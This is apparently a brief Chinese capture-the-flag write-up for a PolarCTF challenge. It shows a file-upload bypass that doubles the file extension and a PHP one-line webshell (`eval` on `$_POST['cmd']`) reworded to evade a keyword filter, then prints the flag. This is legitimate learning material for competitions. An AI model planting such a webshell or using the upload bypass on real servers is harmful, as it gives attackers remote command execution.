【PolarCTF2026年春季挑战赛】GET

直接上传一个php试试

文件名后缀双写可以绕过

可以解析,我们上传一句话木马

提示出现了$_POST['cmd']

那么用下面的webshell,避免POST和cmd一起出现

php 复制代码
<?php $x = $_POST; @eval($x['cmd']); ?>

上传成功,访问一下

得到flag{73121d2832f501293a2e661c4d3a082f}

相关推荐
一名优秀的码农2 小时前
vulhub系列-42-Me-and-My-Girlfriend-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
大方子2 小时前
【PolarCTF2026年春季挑战赛】狗黑子最后的起舞
网络安全·polarctf
℡ 萧3 小时前
OSPF开销值、协议优先级及计时器的修改-新版(17)
网络·网络协议·网络安全·智能路由器·信息与通信
一名优秀的码农3 小时前
vulhub系列-41-DerpNStink: 1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
大方子3 小时前
【PolarCTF2026年春季挑战赛】coke的粉丝团
网络安全·polarctf
旺仔Sec4 小时前
一个“感谢页面“如何让我拿到服务器Root权限?——DC-5靶机渗透实录
web安全·网络安全
淼淼爱喝水5 小时前
DVWA手动盲注SQL实验(详细教程)
数据库·sql·网络安全·oracle·dvwa
一名优秀的码农17 小时前
vulhub系列-39-y0usef(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
Echo-J20 小时前
KVM-VMI项目编译安装全过程,包含所遇问题及解决措施
安全·网络安全·云计算·系统安全